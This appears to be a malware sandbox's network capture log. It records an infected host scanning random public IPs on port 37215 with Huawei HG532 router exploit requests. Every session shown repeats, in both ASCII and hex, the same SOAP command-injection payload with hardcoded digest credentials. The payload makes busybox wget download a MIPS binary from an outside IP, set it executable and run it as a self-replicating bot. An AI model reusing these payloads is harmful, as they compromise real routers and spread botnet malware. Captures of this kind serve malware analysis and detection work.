                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1507192.168.2.234200441.74.251.7437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476387024 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1508192.168.2.233313241.187.206.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476397991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1509192.168.2.233928241.238.121.14037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476449966 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1510192.168.2.2342218157.21.61.14437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476465940 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1511192.168.2.2335044197.224.16.5537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476475000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1512192.168.2.2351058138.149.190.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476481915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1513192.168.2.2342104157.139.162.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476505041 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1514192.168.2.2338588208.57.157.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476505041 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1515192.168.2.2360748197.159.58.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476512909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1516192.168.2.2334328223.240.103.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476615906 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1517192.168.2.2339034197.226.97.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476635933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
